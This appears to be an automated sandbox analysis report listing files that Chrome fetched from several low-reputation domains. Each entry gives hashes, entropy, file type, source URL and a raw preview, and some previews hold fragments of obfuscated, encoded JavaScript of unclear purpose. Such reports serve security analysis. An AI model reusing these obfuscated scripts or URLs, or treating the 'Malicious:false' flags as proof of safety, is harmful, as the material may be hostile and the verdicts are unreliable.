                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYBWAXQBoBvAIgAYBhALwE9qAuAMwFc0YAXAJbpMIcn3ICAlJQBuUAE4ACJAF4aAOgD0fXADZa+TQBsozEPPUArJO2zVizBF2rlcATlwAOCtS198tABMgcam5lY2bHZoAI6acC7uuIQ+fgH4bqFmFta21AAyACIAcsCJHrSp2vjJhibZEXmeHMQAiuW0ulX+esRZ4blR1AAaABIAmgBaHYHdNQDsdWE5kXYAsgDKALbtrp5u3uS+1YF6/St5jDAAggDyifspR2mnnueNQ/jXXCgPbpXPE66TL1AarahgPgbQIPTxdQH+Gog5YfOx8YYwaZ7TyzBH4DK6d6DOwgAAeAHMAAoPeaHY7+Qg1IngwLEABinhpT3pRHmuGZeUCABMIAgaQCeYR5iFQRchvJGJpOXtdPDJfNCAKhkh8jAtg9dLjJZ5+bLUdQUMw3OMHsQ6WlCG5NWbidRAoxKTJbdyHW4+i7wVsANS6Iy2iVpYi0WhauwcSkwNYPQhqyO0N4BvJIAAWfDQyaNkeSseoWwAkghCg98PbqsQAiWULpRtnqz660zM0NWmWIL89gE5sRCKaUa6AKrXSlsh6BVN1xklkNcYizwsL51j8EbGBcCAPLxDw2NkAQABKB/b/mIbkJXbsumujHze1wuCHBxL2YAKowhQ9aHmOZ9HmEt5AEDZVz2AxgJHJcjGARhEnmNw3GA4hRwaV0EEmSYElcFCyDxXRiBlLc8l0ABxGQxQIjxgN0UD72oDh8HkDhkM8IDiPmf1yPlEBaAAIU4/BgJQktiDLRgwwIlDgM8PisPBAA1IVNBnOSiJ5XRPAzfi7EsUZRig3B5j5OY+SUsE8nHNZcF2MzGMs/QSzZJAAHV/wI3QxLxeZdEwmyhkIARcBsAib0sxYS10Yo4DKSLtLSczN2UvJJkINkYGQjDousuU7FuZgIG8sypWi5F0qGYYuGGEBk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 29 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):960
                                                                                                                                                          Entropy (8bit):7.76544071744437
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:T/6RVp8x0dsfncV4L8SFvjaLZX5H473EI:T/6L0BfcqxiZX5KEI
                                                                                                                                                          MD5:34DCE9356D189B4F05F2E2675B520243
                                                                                                                                                          SHA1:25F5196E894F6FB4115C39FCAFC0E0A2411261B2
                                                                                                                                                          SHA-256:43967519C46DAC01D6BD3334848AAE22AE0DA1C1AEBD0625A5D4F87DA7666AE4
                                                                                                                                                          SHA-512:28048423406E40910019F0CD4F2AD66889E6463170B494B9F834896320A4C7D16AE6243CCEAC9934A4950C44B0BE4AB7F51A4A9D6918A90DAA0C9DEBE7BD0220
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR....................pHYs................rIDATH...{.Te.......j..OYt...e.I...VKFbd....Q..$6IiM7.M.2]X-........0/..B.m..1I3..6.n.q..h......p...y.....}.P....t\.....m..u.d..;q...f.N.t_|..l&}....Y....:..;.....@.=..f..p..q.n.......+~.&l..o..,h6....1..K...}......ew..l&=./......D.=....`\....@..~9....@V..{R.>.Wh...<..h..c7~B%jP.K1..j.[:.....P+>.J....1... .N|.U.H...g>!.....u.;...x..RT.g...@. .a;...8.O.-....N..w<X....v,........x...7.Z.........U...\Ga...DQ*...4T...k...=.q.*k...)6L.....9./....hVj..|.Q*..w.*.>..G..Qz7b..O.O>......S.\G....q.....A.z@..{DUjg....'.T>.dm....1_T....K../v.[w.....%[w.....y.k1.E.b.h/...e...w.<...F5.k../@1...C.....l.....2{..j<.?f-om..>.. 1=.$.&..d......Ab]...MS...h..)U.AbS2H.%.DIA.s...X.^.9E...m......&.......,(,.Z=..p/F.~O...Cv.;.4RTS.yg...B...7.G...e.Xt...i.Pt0.....C'..Mo>5.9...0.E.z,.....?....."h.+.aE02....wR..8....0..a ...'3^.Z.4.rE......)..........IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://43370d.top/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (27136), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):27136
                                                                                                                                                          Entropy (8bit):5.695191668316121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:DPnJVDMd9YAgKAQ3fgKAQ3fgKAQ3fhdV0:znJVDLxxmdV0
                                                                                                                                                          MD5:9CB313BAE3305AA77AFB3906885861B4
                                                                                                                                                          SHA1:F5682DC801F0C648236371600370ADAE9D70D4DD
                                                                                                                                                          SHA-256:6C4355A56536B5CB74199A2ECF522A9AECF36FEB6489A50B77F37533093F7771
                                                                                                                                                          SHA-512:99563A6B078875CC36FF8417462BEF8228412E1AF46922C70E08626168C7D49B5142399A8465A228FF831BA56D9DD483AA3E96B1024CC415094E10D1BEFF10F2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202312/202312180557505.png
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiEw6z68LrrwO2flo3B+D7GwlbtYXP42+1IRuEJKIdW137/se9qtv8SpehS8sDI3PMhhOjiaLb3FraTmbpctNvwkCCkQesDdjqkjku9k9lV3icAZtjkX8XlYhpA6SpYdVWMzGqK0MJI2dSUThy22ZN9saPFG17dG057YKe6mozwl4A7BIKpf44V1cmVb8EH43xs7p6RFzAC8KUsJ97beLm3eHGNnW4JvQD1dDoNEsfzOwwlOxL71cptXDb3f+0wYOybwe0aPQbz1dKtOzRu/AWY900JIzCtVqmgQ7f4E9pwHSeU4Ru6RzFCIoN2c1UtHO70evXk3V+/y7hZhFHiU34QiTNdPFYSlEjpmaD8wwBm+oy/R7lFCM5vTvgVG9K8a/89xP0di85LFuhbZujinu+fBwEcFq7nrqusU46ZH4wY8TalLMaoBB3qsX0OgWcLtgwCruIZasaF3LfNc5e6FfErI4Tq4b7+eP3jm/8cJWB0UnN03/vv7NRbK6i5QgU+wgj58PY7sWq+2BugmR8smYuLZetTCQYRWHaYsghz9wQUPfUpgPQgz/iQysv+Ni4sUBxfTRblTl8zcUnruFQPDTumwMqpnqaaRORboWwmNlXi3Dkv4GA6q0ZzZ2GhutWmYCH+0PpivpGXaAhXgdy1eMg7gZLeUUN/PsYon/zGbAVVQU38wAGvPnV0l7w7gzMry+qu6xv+r/ILSt0hX1PYQhppfAhVIwI2D2Y3RnvIDFtS9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 95956
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):33545
                                                                                                                                                          Entropy (8bit):7.991500467452054
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:3b4WXZiJP7IXtOVX6bqn82lJ7IivEicAWGIVuQZikRRKv:3RJiJTIXwAGn82lJ7/vh5IcIRG
                                                                                                                                                          MD5:DDC1E8FCE07F211AFD9C03035149256D
                                                                                                                                                          SHA1:BB86A4EED0E665D56CF8F4B211556F6876F7FDA0
                                                                                                                                                          SHA-256:A4FE9A045492402A80E14D3821974814DBFC12F3F435FB448356ED97CE66A81A
                                                                                                                                                          SHA-512:21B2902A443852730F40322D1983F0E79917855FC2570A0F5A4767C7E06E27DAEC3B50235ED934A49414E2D0A8877202BF62D3BFB0C540612D33EB0845153336
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/js/jquery/jquery-1.11.3.min.js
                                                                                                                                                          Preview:...........y{.......".C...%....p >...xKf.;.h?.HB.&...,2...[..h,.;....\'#bi.Z][.r.sv...|.x.f.........48{~y............,...:.r............H...?{v.....*E9?VI...<.{Q.......r../.n..~.v...w..m...uz..W.QB5w...l(x*.~.,.......*.8.l.]o}O.b.....|w..=....<..9./.`..........C..{4.|Z.......#....b..#..o..h<QY..w.!..U.^..^M.rs....]P....j.=.U........X.......w....M..?.[.ZD.,...Q.]...~....b.o.j.].<..]....._...r.;.....5.;_../.&.8...Y|..$......z....i....8D.....kLX.$....M.n..O..m.T.|...E......?.n..r.mCY?.....M......../..(.]^.#...=....I(.&a.2..}..V..*&4.e...\.....T\B..7....u.....>.+..F%G...<l..e..%%...7m..*m.}.b..p.....e.....T/.d...*...f.x.=..x..P......*...K*...Y.|@e.)wVL.Q/..X.$...].gz.]v..U:.....I8...Uvr.v.......4\.S.#4..F........_.....S;..8}.!.b..g*WS..v"...v.<......o..`8..K..E..J.9.v..hV.l.+........a./v..~.....:...(*.......<..W.!*".*;..+-........<...8..J...u.(E..].....q...&.C.cW.;... .F~B....n....e..b.dh..u.[.2...:.74.Ti.f]dg..7\........?.......Tx=...&...[<^.A...E....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1876
                                                                                                                                                          Entropy (8bit):7.365132072142541
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:iONn2t0sJ3l1Vc9BqsJFX18OJRiidZm0B6:p2LM9BqsdjJRBB6
                                                                                                                                                          MD5:E2DC1E38E5C072C18E880101A864E29D
                                                                                                                                                          SHA1:C8BF24681F5B50CC590B4EE2041C85C4C9591453
                                                                                                                                                          SHA-256:76176A5EBB5144DA81F1496E8F0DC9DF30B8E869CF7CECCC7C1B401B07190FD5
                                                                                                                                                          SHA-512:CD227FA04F811C4AF0CD9E747C70F2DE9BB2207F77C3F6A3D8CA3CB1385B86566162C3313E83572731DA777901FA5079AAACF82EB04F23501722FFFD0302F524
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_sexy_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmpMM:InstanceID="xmp.iid:78FE3E11020511EBBC4CCADF41D5C8E4" xmpMM:DocumentID="xmp.did:78FE3E12020511EBBC4CCADF41D5C8E4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:78FE3E0F020511EBBC4CCADF41D5C8E4" stRef:documentID="xmp.did:78FE3E10020511EBBC4CCADF41D5C8E4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..~D....IDATx..mhSW..'.7.5)}."N...5h?X.SJ.n...fM....W|/.8.X.!.... ..D.cS...D..h..|...Zk[D|i...mr...^n5..C."...qn..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (9788), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9788
                                                                                                                                                          Entropy (8bit):5.925730534881683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:V0A0z9birY7j8oZWk48Fm9UTU0RXX45P/41cnh8ujA/+N2sq/coxT69IR8b4uy:V0A2bQY7j8op0UTU0RX6/4+nu0bq/cor
                                                                                                                                                          MD5:571C13785DCF8153E43EA8A1914A5A60
                                                                                                                                                          SHA1:97CA14E0781A30F12F42AEF77F339F6C6FEB643D
                                                                                                                                                          SHA-256:24A094040278302FBA554B175BA5E92CEDEA1897CF6DA633A86A7EFB6A618601
                                                                                                                                                          SHA-512:97353439E5ABE6E1377C487DC6DD19A5A26F81B9D34E86315784C24E9D1AFBCF1E4DFB21E54079360263303030043564BF15E3E75E4D548E0F09587C0155B471
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/prizeWheel2.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgFYAOAXQBoBvAIigGEB6AFmoC4AzAVzRgBcBLdJhDle5fgEoanJCAAESXgCd+fagG4A8mABWIPgDoAJiHb80IAApKUEEEt4BPTGOoB9NyCQBZFEc4ANiDUVABuUAGcIKwAhAAMAL4S6uFKcmgAvPyY1AwMAGJw1BLkSFkGaJhoJUpZOQAiRsTAxeRQ5ZVKJSh11HEwEOytML0AcgCaAB6arQEZmNnUlggAFoStUJgSmJQJ5Np6fJgwBgC2UBAA4iC8vPZI29jU/EgAMigA5uYh1EhoAMo3ARoD4/CAqABeIAA6isQCAAtYUKcXsFyL8VihgLD4QFqKQSpQbLwoHd/iS7hxuHxBJUpEobpwlGhKNDwHB+LwACpKKBoJDsFBKU6sajE0kgHIAal4KxeBnFd3qIA+UuoJg+EhCbLAHO5vP5nNpooAtKBdZyTco+QKhac5IQkHIQFBZCaUJxeNQEntFSByRKAExUngCIT0xnMuSy+VBNAAflZ7M5PJtguFout/ICEoAGpgTYQ4gBSCRyP3SgsATjiVrlSAMKwi7AAgkoYBI1RqtQlWIlyLYw/yQzTw5R+OxMDEYw3zIKJAzeEy0NhSCkoGkQBkZwY5ygDOD+FC6OgzB91Ivl874wh/ppRgeN7JhBJWKu9nGR0OtkTI2ho/WBiDrSDZxh8sp7BuMBGF+tI/peUa4MQcQAFQ7lBDDeKSKwGJYACSkHtrBY4If+O5xvGgYoVhsq4XhDDkSAaB9nsTYBK2RFcKGcERkuUaMQm+AAGxxAwmBUQJr79gIpwgCeaBnsRdK/nxZGAXuABkGk7nuBgyXJp78B8N53g+0BKM+OkKfu+nyWer7vuIMDoJcKC4Ep8F/tQTIBNKwDmEYWIGHQ9SjG4lgtlyAASaoMPw5wfCAJoQDADDOacpzoAwh5QsAcIIgwHwoG4cS4AeII9k5LkoMGXGjsppH
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wns732.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):35006
                                                                                                                                                          Entropy (8bit):7.988856498745553
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hxYhXRTapcP6CpEEc0s7F0LJmFsQjJC5tVhjExqHYXqa0uL:hxYxRTapK/gStmFhNCZtExilnuL
                                                                                                                                                          MD5:BE847DE8F29881F43BE55C96B76367F3
                                                                                                                                                          SHA1:2A09A9BF7796E4478ED03B52A77888027BFECAC2
                                                                                                                                                          SHA-256:98A61CBB24F9FFE09A3CE437568ADBDE4B5075651A8576A135B8ECA6AB83C873
                                                                                                                                                          SHA-512:34F031EBB5DF4A511AE209BA7CDD4EF66AD45213D34064A711DC24F8E1BA22FA10165AF47EF85315DB13FF1C9F261EBC4836591A5E49A893102F8D477FD947B8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/card/03.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:DE3F311493A511ECAF9BE04F90169D49" xmpMM:InstanceID="xmp.iid:DE3F311393A511ECAF9BE04F90169D49" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730347459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..:S...,IDATx...|TU.>..-.k&....@B.A..QQ..^VT....V..EWWW].........'.H(!.gz.......E@.....|.3..s.9.y..y.{....o...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2084
                                                                                                                                                          Entropy (8bit):7.828276105941885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:mMa2IDTMJvQ+YXFHesNZ1OA6u9f9X1DUcMfnax1bFIEt44:zcAvQ+YXF+sNZ1OAp9X1Afnc1Zh5
                                                                                                                                                          MD5:6D4ED4AD342225EE6B8505E3E4A47199
                                                                                                                                                          SHA1:1BEDE3976E1DAA3FA605D3073651FF6B32CDD068
                                                                                                                                                          SHA-256:35E1685E841B9F019C86E7DBEC2919365D2D51B5FA9FD85B9F4283FFDB3289CF
                                                                                                                                                          SHA-512:4D4B311E569D6B9AEA582DE128C4410B1D6ADA9DA5E6BA844AFC68007561C4513302AE194B929F62C725CBBB80F4C64048542EF547AF9F8BE84DA4FD01952778
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_tp.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......)20\S....IDATH..k.]U.....>.{....)R.T..".... b$..0..!.H..G.$..1.0...THH4...%$b.R.......Ph...t..s.Z.8..BK.JN.9...o=.........E.'....B..WU<.k.-....}O.r..{.A#B.j..@e...(P.....G.x..}@........p..K..8.*..r9Q. .?Fqm..x^..Ce.....G.=...F.MO-.....:A~.......f ......DEc.DE..`...fz67......<.Nu..I...m)..D.I^.Vk8.hF....@..).)..4(Y...B.....i."R.......k..\..G.......E.....Q4..1'...p.w...`(t.d...-......M44Q.#...Zl.[.....q..fhm..m.k....T.......[l.vV.B#.y.i.z.Q.....p..=.C..T45QHES*.I.Z.c.^X.};o..3.3....?_V.-...^.v..[Q.8...G..h..`-..-\t...p.Gp.@..A..G.k..#.ymz9S.()Y>..1.G.^....VUm..Pq.U[Ys..:1.\7....C..\v.Ab..N....y[.._.ff!..JTa$.g$.....<0.Icfl.$[.2B.4.#:..Wl..S....N....7K><I*..... .6<u:O<}&..R..7~q/k....O,y...=.9..#U..$_!.^......?{.3.3....7..5O.....4..9..Y.@."].{.5yf|9]=.......s.R.:.G ...;t;...lE$..B5......4.h6...9l~........q....wf..n... ..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://856217.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://t2391.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2316), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2316
                                                                                                                                                          Entropy (8bit):5.85618718760177
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VsttPpUb7eiVtY6XEohvESeJXFKwiKKMYaT5VlnHnV3nn:VwJab7emHshXYAHVX
                                                                                                                                                          MD5:75AA2B864CD1642E1CC069573C0F27E5
                                                                                                                                                          SHA1:C461BC187C235E674E9AC1616C820D3437C11828
                                                                                                                                                          SHA-256:3495B4071EDA392DDD8E67A03A46DEC864EB0D3B5D8D47DAAC50C85121697F5B
                                                                                                                                                          SHA-512:85E9BBF88A9A3C16B8FEFA78307735F855CBED3DA123C8274CE2E388E08BC5E2A6BF8EA539078FA8A9C46DD7BAF2FC9ED9FD18D864CA5C09C968EC567119FAAA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/hCaptcha.js
